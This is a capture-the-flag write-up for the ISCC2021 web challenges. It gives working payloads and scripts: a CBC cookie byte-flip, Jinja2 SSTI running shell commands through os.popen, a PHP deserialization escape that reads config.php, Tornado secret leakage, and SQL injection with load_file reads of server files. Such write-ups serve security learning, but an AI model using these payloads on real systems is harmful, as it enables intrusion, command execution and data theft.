ISCC2021: Web section
2022-08-04 05:27:00 【Ki10Moc】
Practice (练武)
ISCC客服冲冲冲(一) (ISCC Customer Service, Go Go Go, part 1)
This challenge requires the left customer-service agent's vote count to end up higher than the right one's.
I only know two methods; I'm a noob, after all, so allow me that.
1.
Swap the left and right buttons,
and that's it.
2. Enter it in the browser console,
press Enter, and off you go.
Up, up, keep going up... did you skip breakfast?
Both tricks work for the same reason: the vote counting runs entirely in client-side JavaScript, so anything the page can do, the console can do too.
What's this?
Found a whole pile of these.
JSFuck: decode it.
Web01
Too obvious: robots.txt.
Same pattern as the 攻防世界 (adworld) challenge: if robots.txt says not to visit a path, visit it.
That gives the source (code.txt):
<?php
if (isset ($_GET['password'])) {
    if (preg_match ("/^[a-zA-Z0-9]+$/", $_GET['password']) === FALSE)
    {
        echo '<p>You password must be alphanumeric</p>';
    }
    else if (strlen($_GET['password']) < 8 && $_GET['password'] > 9999999)
    {
        if (strpos ($_GET['password'], '*-*') !== FALSE)
        {
            die('Flag: ' . $flag);
        }
        else
        {
            echo('<p>*-* have not been found</p>');
        }
    }
    else
    {
        echo '<p>Invalid password</p>';
    }
}
?>
Code audit...
The preg_match is meant to restrict password to one or more digits and upper/lower-case letters. But preg_match() returns 0 when there is no match and FALSE only on an error, so the `=== FALSE` branch never fires: the regex check is dead and any characters get through.
strlen() requires a length under 8 while the value must compare greater than 9999999. Scientific notation solves that: 1e8 (e for exponent) is three characters but PHP's loose comparison turns the leading numeric part of the string into 100000000 (this is PHP 7 behaviour; PHP 8 compares a non-numeric string against an integer as strings, so the trick no longer works there).
Because the regex check is dead, no null-byte (%00) truncation is needed at all; the '*-*' can simply be appended, and strpos() finds it:
?password=1e8*-*
ISCC客服一号冲冲冲(二) (ISCC Customer Service No. 1, Go Go Go, part 2)
Download the image (finding the source really is the hard part; without a hint from a senior I would never have found it).
After downloading: LSB steganography, bit 0 of the Blue channel.
Oh, there's something in there.
Source:
<?php
define("SECRET_KEY", '101010031231243214');
define("METHOD", "aes-128-cbc");
session_start();

function get_random_iv(){
    $random_iv='';
    for($i=0;$i<16;$i++){
        $random_iv.=chr(rand(1,255));
    }
    return $random_iv;
}

function login($info){
    $iv = get_random_iv();
    $plain = serialize($info);
    $cipher = openssl_encrypt($plain, METHOD, SECRET_KEY, OPENSSL_RAW_DATA, $iv);
    $_SESSION['username'] = $info['username'];
    $_SESSION['password'] = $info['password'];
    setcookie("iv", base64_encode($iv));
    setcookie("cipher", base64_encode($cipher));
}

function check_login(){
    if(isset($_COOKIE['cipher']) && isset($_COOKIE['iv'])){
        $cipher = base64_decode($_COOKIE['cipher']);
        $iv = base64_decode($_COOKIE["iv"]);
        if($plain = openssl_decrypt($cipher, METHOD, SECRET_KEY, OPENSSL_RAW_DATA, $iv)){
            $info = unserialize($plain) or die("<p>base64_decode('".base64_encode($plain)."') can't unserialize</p>");
            $_SESSION['username'] = $info['username'];
        }else{
            die("ERROR!");
        }
    }
}

function show_homepage(){
    if ($_SESSION["username"]==='admin'&& $_SESSION["password"]=== password)
    {
        echo '<p>Hello admin</p>';
        echo '<p>Flag is '.flag.'</p>';
    }
    else if($_SESSION["password"] == password)
    {
        echo '<p>hello '.$_SESSION['username'].'</p>';
        echo '<p>You can\'t see flag</p>';
    }
    else
    {
        echo '<p>Sorry,password is incorrect</p>';
    }
}

if(isset($_POST['username']) && isset($_POST['password'])){
    $username = (string)$_POST['username'];
    $password = (string)$_POST['password'];
    if($username === 'admin'){
        exit('<p>admin are not allowed to login</p>');
    }else{
        $info = array('username'=>$username,'password'=>$password);
        login($info);
        show_homepage();
    }
}else{
    if(isset($_SESSION["username"])){
        check_login();
        show_homepage();
    }else{
        echo ' <body class="login-body"> <div id="wrapper" style = "width:800px; height:200px; overflow:hidden;"> <img class="img1" src="login.bmp" alt="login" /> </div> </body>';
    }
}
?>
Looking at the original page, it roughly takes a username and a password.
But there is nowhere to type them in. Influenced by the first challenge, I kept digging through the front-end JS looking for things like "dis", which was completely off track (noob).
Pass the parameters:
username=admik&password=1SCC_2o2l_KeFuu
Intercept the request.
The values we submit are serialized here: a:2:{s:8:"username";s:5:"admik";s:8:"password";s:15:"1SCC_2o2l_KeFuu";}.
We get an iv and a cipher back, and only admin can see the flag. The catch is that we cannot log in as admin, so we need a byte flip: turn the "k" of the admik we submitted into the "n" of admin. In CBC, plaintext block i is D(C_i) XOR C_(i-1), so XORing one byte of ciphertext block 0 flips exactly that byte of plaintext block 1; the "k" is byte 13 of block 1 (the block starting at me";s:5:"), which is why the script below flips cipher byte 13.
CBC explanation: https://blog.csdn.net/csu_vc/article/details/79619309
The scripts are attached at the end.
Paste the iv and cipher into the left side: as expected, we can't reach the flag.
URL-decode the cipher.
Base64-decode the decoded cipher and flip the byte:
TqNbrcYMj35+XQQFPoFoNkqSrqL9ygnG4od7abehLv9NRyQvo89y5PeLuUuUT4P+5RqSH6MOxNJwuCMqR8lxEy82AOerWeHacK6JmKwy4IU=
Replace the original cipher with it and URL-encode again.
Send.
The flip changes the byte we want in block 1, but block 0 is decrypted from the modified ciphertext block and comes out as garbage.
Block 0 is the one XORed with the iv (the "round 0 ciphertext"), so it no longer matches the expected a:2:{s:8:"userna and unserialize() fails; conveniently, the server echoes the garbage plaintext in base64.
That garbage is D(C_0) XOR iv, so XORing the iv with the garbage and with the bytes we actually want gives an iv that makes block 0 decrypt correctly. URL-decode the iv, feed it and the unserializable content from the response into the script, and get the new iv.
URL-encode the new iv and replace the original one with it.
Send.
Scripts:
<?php
// Step 2: repair block 0 through the IV.
$enc = base64_decode("<the unserializable content echoed by the server>");
$iv = base64_decode("<the original iv, URL-decoded>");
$cleartext = 'a:2:{s:8:"userna';   // the first 16 bytes of the plaintext we want
$newiv = '';
for ($i = 0; $i < 16; $i++) {
    $newiv .= chr(ord($iv[$i]) ^ ord($enc[$i]) ^ ord($cleartext[$i]));
}
echo base64_encode($newiv);
?>

<?php
// Step 1: flip byte 13 of ciphertext block 0 so byte 13 of plaintext block 1 becomes "n".
$enc = base64_decode("<the cipher cookie, URL-decoded>");
$enc[13] = chr(ord($enc[13]) ^ ord("k") ^ ord("n"));
echo base64_encode($enc);
?>
If URL-decoding by hand is a hassle, write it directly as
base64_decode(urldecode('<initial iv or cipher value>'))
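The whole byte-flip attack, run end to end, as an added example (not the challenge's or the author's code). The challenge uses aes-128-cbc; to stay dependency-free this script swaps AES for a toy 16-byte Feistel block cipher keyed with SHA-256, which is an assumption of the example only. CBC mode around it is exact, so the mechanics are identical: flipping ciphertext byte 13 changes plaintext byte 29 ("k" to "n") and turns block 0 into garbage, and the leaked garbage lets us forge an IV that repairs block 0. The two attacker-side functions, flip_cipher and forge_iv, work unchanged on the real cookies.

```python
import base64
import hashlib
import os
from urllib.parse import unquote

BLOCK = 16


def _xor(a: bytes, b: bytes) -> bytes:
    return bytes(x ^ y for x, y in zip(a, b))


def _round(key: bytes, r: int, half: bytes) -> bytes:
    # Keyed round function of the toy cipher; SHA-256 keeps it dependency-free.
    return hashlib.sha256(key + bytes([r]) + half).digest()[:8]


def toy_encrypt_block(key: bytes, block: bytes) -> bytes:
    """4-round Feistel permutation of one 16-byte block (stand-in for AES)."""
    left, right = block[:8], block[8:]
    for r in range(4):
        left, right = right, _xor(left, _round(key, r, right))
    return left + right


def toy_decrypt_block(key: bytes, block: bytes) -> bytes:
    left, right = block[:8], block[8:]
    for r in reversed(range(4)):
        left, right = _xor(right, _round(key, r, left)), left
    return left + right


def cbc_encrypt(key: bytes, iv: bytes, plain: bytes) -> bytes:
    pad = BLOCK - len(plain) % BLOCK
    plain += bytes([pad]) * pad                    # PKCS#7, like openssl_encrypt
    out, prev = b"", iv
    for i in range(0, len(plain), BLOCK):
        prev = toy_encrypt_block(key, _xor(plain[i:i + BLOCK], prev))
        out += prev
    return out


def cbc_decrypt(key: bytes, iv: bytes, cipher: bytes) -> bytes:
    out, prev = b"", iv
    for i in range(0, len(cipher), BLOCK):
        blk = cipher[i:i + BLOCK]
        out += _xor(toy_decrypt_block(key, blk), prev)   # P_i = D(C_i) ^ C_(i-1)
        prev = blk
    pad = out[-1]
    if not 1 <= pad <= BLOCK or out[-pad:] != bytes([pad]) * pad:
        raise ValueError("bad padding")             # openssl_decrypt returns false here
    return out[:-pad]


def php_serialize_login(username: str, password: str) -> bytes:
    """serialize(array('username'=>..., 'password'=>...)) for ASCII input."""
    return (f'a:2:{{s:8:"username";s:{len(username)}:"{username}";'
            f's:8:"password";s:{len(password)}:"{password}";}}').encode()


def cookie_bytes(value: str) -> bytes:
    """Cookie values on the wire are base64 then URL-encoded; undo both."""
    return base64.b64decode(unquote(value))


def flip_cipher(cipher: bytes, pos: int, old: str, new: str) -> bytes:
    """XOR ciphertext byte pos so that plaintext byte pos+16 changes old -> new."""
    c = bytearray(cipher)
    c[pos] ^= ord(old) ^ ord(new)
    return bytes(c)


def forge_iv(iv: bytes, leaked_block: bytes, wanted_block: bytes) -> bytes:
    """P_0 = D(C_0) ^ iv. The server leaked P_0 (garbage), so iv ^ P_0 = D(C_0)."""
    return _xor(_xor(iv, leaked_block), wanted_block)


def run_attack(password: str = "1SCC_2o2l_KeFuu") -> bytes:
    key, iv = os.urandom(16), os.urandom(16)        # server-side secrets, never learned
    plain = php_serialize_login("admik", password)
    cipher = cbc_encrypt(key, iv, plain)             # the iv/cipher cookies we receive
    assert plain[29:30] == b"k"                      # byte 13 of plaintext block 1

    # Step 1: flip byte 13 of ciphertext block 0; plaintext block 1 gets 'n',
    # plaintext block 0 becomes garbage that unserialize() rejects and echoes.
    cipher2 = flip_cipher(cipher, 13, "k", "n")
    leaked = cbc_decrypt(key, iv, cipher2)
    assert leaked[16:32] == b'me";s:5:"admin";'

    # Step 2: choose an IV so that block 0 decrypts to the bytes we want.
    iv2 = forge_iv(iv, leaked[:16], b'a:2:{s:8:"userna')
    return cbc_decrypt(key, iv2, cipher2)
```

Against the live target you would call flip_cipher on cookie_bytes(cipher_cookie), submit it, then forge_iv with cookie_bytes(iv_cookie) and the base64 blob from the "can't unserialize" message, re-encode both with base64 and URL-encoding, and submit again. The same arithmetic works for any byte you want to change, as long as the target byte is not in plaintext block 0 (for that block you change the IV directly).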
lovely ssti
From the name: SSTI.
SSTI, server-side template injection.
Never heard of it before...
Two Jinja2 payloads. Both avoid writing the blocked tokens literally: underscores are fetched by indexing into an object's string form, attribute names are assembled with dict(...)|join, and strings like "po""pen" are concatenated at parse time.
{%set pp=(dict(pop=a))|join%}
{%set xiahua=(lipsum|select|string|list)|attr(pp)(24)%}
{%set g=(lipsum|select|string|list)|attr(pp)(1)%}
{%set gb=(xiahua,xiahua,g,dict(lo=a,bals=a)|join,xiahua,xiahua)|join%}
{%set gm=(xiahua,xiahua,g,dict(e=a,titem=a)|join,xiahua,xiahua)|join%}
{%set bl=(xiahua,xiahua,dict(builtins=a)|join,xiahua,xiahua)|join%}
{%set chcr=(lipsum|attr(gb)|attr(gm)(bl))|attr("ge""t")("ch""r")%}
{%set dian=chcr(46)%}
{%set space=chcr(32)%}
{%set xing=chcr(42)%}
{%set shell=("cat ","requirements",dian,"txt")|join%}
{%set shell2=("find / -name ",xing,"fl","ag",xing)|join%}
{%set shell3=("cat /usr/fl","ag",xiahua,"is",xiahua,"here",dian,"txt")|join%}
{{lipsum|attr(gb)|attr(gm)("o""s")|attr("po""pen")(shell3)|attr("read")()}}
How it works: lipsum|select|string is "<generator object select_or_reject at 0x...>", so index 24 is "_" and index 1 is "g"; pp is "pop" so attr(pp)(24) is list.pop(24). gb then spells __globals__ and gm __getitem__ (dict keyword order is preserved by |join, so the keys must be lo,bals and e,titem), bl is __builtins__, and chcr is builtins chr(), used to build ".", " " and "*" without typing them. The final line is lipsum.__globals__["os"].popen(shell3).read().
{% set xiahua=(config|string)[14]%}
{% set gb=(xiahua,xiahua,"globals",xiahua,xiahua)|join %}
{% set bl=(xiahua,xiahua,"builtins",xiahua,xiahua)|join %}
{% set cr=(lipsum|attr(gb)|attr("get")(bl))["ch""r"] %}
{% set dian=cr(46)%}
{% set xing =cr(42)%}
{% set shell=("find / -name ",xing,"fla",xing)|join%}
{% set shell4 = "cat /usr/fla??is?here?txt"%}
{{(lipsum|attr(gb)|attr("get")("o""s")|attr("po""pen")(shell4))|attr("read")()}}
Here is the senior's writeup that these payloads come from:
https://blog.csdn.net/jvkyvly/article/details/116953370
登录 (Login)
www.zip gives the source.
index.php
<?php
require_once('class.php');
if($_SESSION['username']) {
header('Location: profile.php');
exit;
}
if($_POST['username'] && $_POST['password']) {
$username = $_POST['username'];
$password = $_POST['password'];
if(strlen($username) < 3 or strlen($username) > 16)
die('Invalid user name');
if(strlen($password) < 3 or strlen($password) > 16)
die('Invalid password');
if($user->login($username, $password)) {
$_SESSION['username'] = $username;
header('Location: profile.php');
exit;
}
else {
die('Invalid user name or password');
}
}
else {
?>
<!DOCTYPE html>
<html>
<head>
<title>Login</title>
<link href="static/bootstrap.min.css" rel="stylesheet">
<script src="static/jquery.min.js"></script>
<script src="static/bootstrap.min.js"></script>
</head>
<body>
<div class="container" style="margin-top:100px">
<form action="index.php" method="post" class="well" style="width:220px;margin:0px auto;">
<img src="static/piapiapia.gif" class="img-memeda " style="width:180px;margin:0px auto;">
<h3>Login</h3>
<label>Username:</label>
<input type="text" name="username" style="height:30px"class="span3"/>
<label>Password:</label>
<input type="password" name="password" style="height:30px" class="span3">
<button type="submit" class="btn btn-primary">LOGIN</button>
</form>
</div>
</body>
</html>
<?php
}
?>
After a correct username and password, the user is redirected to profile.php.
profile.php
<?php
require_once('class.php');
if($_SESSION['username'] == null) {
die('Login First');
}
$username = $_SESSION['username'];
$profile=$user->show_profile($username);
if($profile == null) {
header('Location: update.php');
}
else {
$profile = unserialize($profile);
$phone = $profile['phone'];
$email = $profile['email'];
$nickname = $profile['nickname'];
$photo = base64_encode(file_get_contents($profile['photo']));
?>
<!DOCTYPE html>
<html>
<head>
<title>Profile</title>
<link href="static/bootstrap.min.css" rel="stylesheet">
<script src="static/jquery.min.js"></script>
<script src="static/bootstrap.min.js"></script>
</head>
<body>
<div class="container" style="margin-top:100px">
<img src="data:image/gif;base64,<?php echo $photo; ?>" class="img-memeda " style="width:180px;margin:0px auto;">
<h3>Hi <?php echo $nickname;?></h3>
<label>Phone: <?php echo $phone;?></label>
<label>Email: <?php echo $email;?></label>
</div>
</body>
</html>
<?php
}
?>
The stored profile is unserialized and its fields are displayed; note that photo is passed straight to file_get_contents().
register.php
<?php
require_once('class.php');
if($_POST['username'] && $_POST['password']) {
$username = $_POST['username'];
$password = $_POST['password'];
if(strlen($username) < 3 or strlen($username) > 16)
die('Invalid user name');
if(strlen($password) < 3 or strlen($password) > 16)
die('Invalid password');
if(!$user->is_exists($username)) {
$user->register($username, $password);
echo 'Register OK!<a href="index.php">Please Login</a>';
}
else {
die('User name Already Exists');
}
}
else {
?>
<!DOCTYPE html>
<html>
<head>
<title>Login</title>
<link href="static/bootstrap.min.css" rel="stylesheet">
<script src="static/jquery.min.js"></script>
<script src="static/bootstrap.min.js"></script>
</head>
<body>
<div class="container" style="margin-top:100px">
<form action="register.php" method="post" class="well" style="width:220px;margin:0px auto;">
<img src="static/piapiapia.gif" class="img-memeda " style="width:180px;margin:0px auto;">
<h3>Register</h3>
<label>Username:</label>
<input type="text" name="username" style="height:30px"class="span3"/>
<label>Password:</label>
<input type="password" name="password" style="height:30px" class="span3">
<button type="submit" class="btn btn-primary">REGISTER</button>
</form>
</div>
</body>
</html>
<?php
}
?>
upload.php
<?php
require_once('class.php');
if($_SESSION['username'] == null) {
die('Login First');
}
if($_POST['phone'] && $_POST['email'] && $_POST['nickname'] && $_FILES['photo']) {
$username = $_SESSION['username'];
if(!preg_match('/^\d{11}$/', $_POST['phone']))
die('Invalid phone');
if(!preg_match('/^[_a-zA-Z0-9]{1,10}@[_a-zA-Z0-9]{1,10}\.[_a-zA-Z0-9]{1,10}$/', $_POST['email']))
die('Invalid email');
if(preg_match('/[^a-zA-Z0-9_]/', $_POST['nickname']) || strlen($_POST['nickname']) > 10)
die('Invalid nickname');
$file = $_FILES['photo'];
if($file['size'] < 5 or $file['size'] > 1000000)
die('Photo size error');
move_uploaded_file($file['tmp_name'], 'upload/' . md5($file['name']));
$profile['phone'] = $_POST['phone'];
$profile['email'] = $_POST['email'];
$profile['nickname'] = $_POST['nickname'];
$profile['photo'] = 'upload/' . md5($file['name']);
$user->update_profile($username, serialize($profile));
echo 'Update Profile Success!<a href="profile.php">Your Profile</a>';
}
else {
?>
<!DOCTYPE html>
<html>
<head>
<title>UPDATE</title>
<link href="static/bootstrap.min.css" rel="stylesheet">
<script src="static/jquery.min.js"></script>
<script src="static/bootstrap.min.js"></script>
</head>
<body>
<div class="container" style="margin-top:100px">
<form action="update.php" method="post" enctype="multipart/form-data" class="well" style="width:220px;margin:0px auto;">
<img src="static/piapiapia.gif" class="img-memeda " style="width:180px;margin:0px auto;">
<h3>Please Update Your Profile</h3>
<label>Phone:</label>
<input type="text" name="phone" style="height:30px"class="span3"/>
<label>Email:</label>
<input type="text" name="email" style="height:30px"class="span3"/>
<label>Nickname:</label>
<input type="text" name="nickname" style="height:30px" class="span3">
<label for="file">Photo:</label>
<input type="file" name="photo" style="height:30px"class="span3"/>
<button type="submit" class="btn btn-primary">UPDATE</button>
</form>
</div>
</body>
</html>
<?php
}
?>
The submitted fields are serialized and stored (note the file is named upload.php but the form posts to update.php).
class.php
<?php
require('config.php');

class user extends mysql{
    private $table = 'users';

    public function is_exists($username) {
        $username = parent::filter($username);
        $where = "username = '$username'";
        return parent::select($this->table, $where);
    }

    public function register($username, $password) {
        $username = parent::filter($username);
        $password = parent::filter($password);
        $key_list = Array('username', 'password');
        $value_list = Array($username, md5($password));
        return parent::insert($this->table, $key_list, $value_list);
    }

    public function login($username, $password) {
        $username = parent::filter($username);
        $password = parent::filter($password);
        $where = "username = '$username'";
        $object = parent::select($this->table, $where);
        if ($object && $object->password === md5($password)) {
            return true;
        } else {
            return false;
        }
    }

    public function show_profile($username) {
        $username = parent::filter($username);
        $where = "username = '$username'";
        $object = parent::select($this->table, $where);
        return $object->profile;
    }

    public function update_profile($username, $new_profile) {
        $username = parent::filter($username);
        $new_profile = parent::filter($new_profile);
        $where = "username = '$username'";
        return parent::update($this->table, 'profile', $new_profile, $where);
    }

    public function __tostring() {
        return __class__;
    }
}

class mysql {
    private $link = null;

    public function connect($config) {
        $this->link = mysql_connect(
            $config['hostname'],
            $config['username'],
            $config['password']
        );
        mysql_select_db($config['database']);
        mysql_query("SET sql_mode='strict_all_tables'");
        return $this->link;
    }

    public function select($table, $where, $ret = '*') {
        $sql = "SELECT $ret FROM $table WHERE $where";
        $result = mysql_query($sql, $this->link);
        return mysql_fetch_object($result);
    }

    public function insert($table, $key_list, $value_list) {
        $key = implode(',', $key_list);
        $value = '\'' . implode('\',\'', $value_list) . '\'';
        $sql = "INSERT INTO $table ($key) VALUES ($value)";
        return mysql_query($sql);
    }

    public function update($table, $key, $value, $where) {
        $sql = "UPDATE $table SET $key = '$value' WHERE $where";
        return mysql_query($sql);
    }

    public function filter($string) {
        $escape = array('\'', '\\\\');
        $escape = '/' . implode('|', $escape) . '/';
        $string = preg_replace($escape, '_', $string);
        $safe = array('select', 'insert', 'update', 'delete', 'where');
        $safe = '/' . implode('|', $safe) . '/i';
        return preg_replace($safe, 'hacker', $string);
    }

    public function __tostring() {
        return __class__;
    }
}

session_start();
$user = new user();
$user->connect($config);
config.php
<?php
$config['hostname'] = '127.0.0.1';
$config['username'] = 'root';
$config['password'] = '';
$config['database'] = '';
$flag = '';
?>
config.php is where the flag lives.
And in profile.php we have
$photo = base64_encode(file_get_contents($profile['photo']));
so the plan is to make $profile['photo']
equal to config.php,
which turns the line into
$photo = base64_encode(file_get_contents('config.php'));
and the contents of config.php are emitted base64-encoded in the img tag.
public function filter($string) {
    $escape = array('\'', '\\\\');
    $escape = '/' . implode('|', $escape) . '/';
    $string = preg_replace($escape, '_', $string);
    $safe = array('select', 'insert', 'update', 'delete', 'where');
    $safe = '/' . implode('|', $safe) . '/i';
    return preg_replace($safe, 'hacker', $string);
}
This filter in class.php is applied by update_profile() to the already serialized profile string, after serialize() has written the s:N: length prefixes.
upload.php also validates the fields:
if(preg_match('/[^a-zA-Z0-9_]/', $_POST['nickname']) || strlen($_POST['nickname']) > 10)
    die('Invalid nickname');
Sending nickname[]=
(an array) bypasses it: preg_match() on an array returns false (with a warning) and strlen() on an array returns NULL, so neither condition trips, and serialize() then emits the array as a:1:{i:0;s:N:"...";}.
$safe = array('select', 'insert', 'update', 'delete', 'where');
$safe = '/' . implode('|', $safe) . '/i';
return preg_replace($safe, 'hacker', $string);
}
Every keyword is replaced by the six-character "hacker", but only "where" is five characters, so each "where" grows the string by one byte while the s:N: prefix still says the old length. unserialize() reads exactly N bytes, so the extra bytes push the tail of our nickname out of the string, where it is parsed as serialized data; that is how we push config.php into the photo field that file_get_contents() reads.
Walkthrough
Payload:
";}s:5:"photo";s:10:"config.php";}
It closes the current string and the nickname array, sets photo to config.php, and closes the outer array; unserialize() ignores whatever follows (the real photo entry).
This payload ";}s:5:"photo";s:10:"config.php";}
is 34 characters, and each "where" gains one character, so we put 34 "where"s in front of it inside nickname[].
Back to the challenge.
Register through register.php.
Log in; we land on the upload page.
Intercept the request.
Change nickname to an array here (nickname[]) carrying the 34 "where"s plus the payload.
Go back to the profile page and find the image's base64.
Decode it: config.php, flag included.
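The length-escape worked through in code, as an added example (not the challenge's or the author's code). It re-implements serialize(), the class.php filter, and just enough of unserialize() (ints, strings, arrays, trailing data ignored) to show why the string declared as s:204: ends early once 34 "where"s have become "hacker"s. The phone, email and photo filename are constructed sample values.

```python
import hashlib
import re

INJECT = '";}s:5:"photo";s:10:"config.php";}'   # 34 bytes, as on the page


def php_serialize(v) -> str:
    """serialize() for the subset we need: int, str (ASCII), list, dict."""
    if isinstance(v, bool):
        return "b:%d;" % v
    if isinstance(v, int):
        return f"i:{v};"
    if isinstance(v, str):
        return f's:{len(v.encode())}:"{v}";'
    if isinstance(v, list):
        v = dict(enumerate(v))                     # nickname[] arrives as a list
    if isinstance(v, dict):
        body = "".join(php_serialize(k) + php_serialize(x) for k, x in v.items())
        return f"a:{len(v)}:{{{body}}}"
    raise TypeError(type(v))


def class_php_filter(s: str) -> str:
    """mysql::filter(): quotes/backslashes -> '_', then keyword -> 'hacker'."""
    s = re.sub(r"'|\\", "_", s)
    return re.sub(r"select|insert|update|delete|where", "hacker", s, flags=re.I)


def php_unserialize(s: str):
    """Minimal unserialize(): trusts s:N: byte counts and ignores trailing data."""
    pos = 0

    def parse():
        nonlocal pos
        tag = s[pos]
        if tag == "i":
            end = s.index(";", pos)
            val, pos = int(s[pos + 2:end]), end + 1
            return val
        if tag == "s":
            colon = s.index(":", pos + 2)
            n, start = int(s[pos + 2:colon]), colon + 2
            if s[start + n:start + n + 2] != '";':
                raise ValueError("string length mismatch at %d" % pos)
            pos = start + n + 2
            return s[start:start + n]
        if tag == "a":
            colon = s.index(":", pos + 2)
            n, pos = int(s[pos + 2:colon]), colon + 2
            out = {}
            for _ in range(n):
                k = parse()
                out[k] = parse()
            if s[pos] != "}":
                raise ValueError("unterminated array")
            pos += 1
            return out
        raise ValueError("unsupported tag %r" % tag)

    return parse()


def build_nickname(inject: str = INJECT, word: str = "where", repl: str = "hacker") -> str:
    """Prefix enough filtered words that their growth equals len(inject)."""
    growth = len(repl) - len(word)                # 1 extra byte per 'where'
    if len(inject) % growth:
        raise ValueError("pad inject to a multiple of the growth")
    return word * (len(inject) // growth) + inject


def stored_profile(nickname) -> str:
    """What update_profile() writes to the DB: serialize(), then filter()."""
    profile = {                                   # constructed sample values
        "phone": "13800000000",
        "email": "ctf@iscc.cn",
        "nickname": nickname,
        "photo": "upload/" + hashlib.md5(b"a.gif").hexdigest(),
    }
    return class_php_filter(php_serialize(profile))


def exploit_photo_path() -> str:
    """The path profile.php hands to file_get_contents() after the escape."""
    return php_unserialize(stored_profile([build_nickname()]))["photo"]
```

Printing stored_profile([build_nickname()]) shows the stored string: the nickname is declared s:204: but now holds 204 bytes of "hacker" followed by the 34-byte tail, which the parser consumes as ";}s:5:"photo";s:10:"config.php";} before it ever reaches the real photo entry.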
Arena (擂台)
tornado
I think I've done this challenge before...
About tornado
It is a Python web framework (the tornado module).
Template injection may be present.
Back to the challenge.
flag.txt says the flag is in /fllllllllllllaaaaaag,
but it can't be accessed directly (only a beginner like me would even try).
/welcome.txt
render
/hints.txt
md5(cookie_secret+md5(filename))
hints.txt gives the calculation:
first MD5 the filename,
then MD5 the concatenation of cookie_secret
with that MD5 of the filename.
So we need both values:
filename
and cookie_secret.
Following flag.txt's hint we try ?filename=/fllllllllllllaaaaaag
Ah... the error page reflects the msg parameter, so this must be some kind of injection too.
Read the handler's settings through the msg parameter, which Tornado renders as a template (handler.settings is the Application settings dict, and cookie_secret is stored there):
?msg={{handler.settings}}
That gives the value of cookie_secret.
<?php
$cookie = 'ef57c331-744f-4528-b434-9746317d4f6a';
$filename = '/fllllllllllllaaaaaag';
echo md5($cookie . md5($filename));
?>
This computes the filehash:
1ad9b8e09fbe539bc5a6f2c8bc0ab5db
Request the file with both parameters (filename and filehash) to get the flag.
easyweb
Very straightforward.
Injection.
First work out the closing quote.
Tried it: --+ makes the script die() outright,
so it is evidently filtered,
but # only produces an error.
Try URL-encoding # as %23:
we get a response.
Spaces are filtered too;
%0d (carriage return) can stand in for them.
union select is filtered as well,
but double-writing gets through, since the filter strips the keyword once rather than recursively:
?id=0'%0dununionion%0dselselectect%0d1,2,3%23
We get a response.
?id=0'%0Dununionion%0Dselselectect%0D1,database(),3%23
gives the database name.
?id=0'%0Dununionion%0Dselselectect%0D1,(selselectect%0Dgroup_concat(table_name)%0DFROM%0Dsys.schema_table_statistics_with_buffer),3%0D%23
lists table names from the sys schema view (which does not go through information_schema). The table is iscc_flag; try flag as the column name:
?id=0'%0dununionion%0dselselectect%0d1,(selselectect%0dflag%0dFROM%0discc_flag),3%0d%23
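A small encoder that produces the payloads above from plain SQL, plus a model of the target's filter to check them against, as an added example (not the challenge's code). The filter model (reject "--" and raw spaces, strip each blacklisted keyword once, case-insensitively) is inferred from the behaviour described on the page; the challenge's real source is not shown, so treat it as an assumption.

```python
import re
from typing import Optional
from urllib.parse import unquote

BLOCKED = ["union", "select"]         # keywords the page found filtered


def double_write(word: str) -> str:
    """union -> ununionion: removing one inner copy leaves the word intact."""
    half = len(word) // 2
    return word[:half] + word + word[half:]


def encode_payload(sql: str, blocked=BLOCKED) -> str:
    """Plain SQL -> value for the id parameter, as typed into the URL."""
    out = sql
    for kw in blocked:
        out = re.sub(kw, lambda m: double_write(m.group(0)), out, flags=re.I)
    out = out.replace(" ", "%0d")     # CR in place of the filtered space
    return out.replace("#", "%23")    # comment marker must be URL-encoded


def server_filter(raw_id: str) -> Optional[str]:
    """Assumed filter model: None means die(); otherwise the SQL MySQL sees."""
    q = unquote(raw_id)
    if "--" in q or " " in q:
        return None
    for kw in BLOCKED:
        q = re.sub(kw, "", q, flags=re.I)   # strips each keyword once
    return q
```

encode_payload("0' union select 1,2,3#") reproduces the first working payload byte for byte, and server_filter shows the query that reaches MySQL after one round of stripping: "0'\runion\rselect\r1,2,3#", where MySQL treats the carriage returns as whitespace.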
The result tells us to visit cccmd.php,
which gives the source:
<?php
if(isset($_GET['c'])){
    $c=$_GET['c'];
    if(preg_match("/[zxcvbMnlkjhgfsaoiuytreq]+|[ZXCVBNLKKJHGFSAOIUYTREQ]+|[0123456789]+|\(|\/|\*|\-|\+|\.|\{|\}|\[|\]|\'|\"|\?|\>|\<|\,|\)|\(|\&|\^|\%|\#|\@|\!/", $c)){
        exit("die!!");
    }else{
        echo `$c`;
    }
}else{
    highlight_file(__FILE__);
}
?>
<!--flllllllllaaag.php-->
The most important thing in this source is the comment naming flllllllllaaag.php,
which is where the flag lives.
If you have got this far you already know the filters from before, so they are not much use here. (For the record, the regex leaves d, m, p, w, D, P, W and the characters $ _ | ; = : ~ \ backtick and whitespace unblocked, and $c runs inside backticks, so a letter-free shell payload would also be an option.)
?id=-1'%0duniunionon%0dselselectect%0d1,(load_file('/etc/apache2/sites-available/000-default.conf')),3%23 // this is Apache's default vhost config path; it reveals the DocumentRoot
Finally, read the source of flllllllllaaag.php with load_file() the same way.
This post is still incomplete and will be filled in later.
My level is very low; I hope any seniors passing by can give pointers.
I also hope to learn from and exchange ideas with other players.
I am a hobbyist, a first-year student not in this major,
doing this purely out of interest and with a lot more to learn.
Thanks for reading...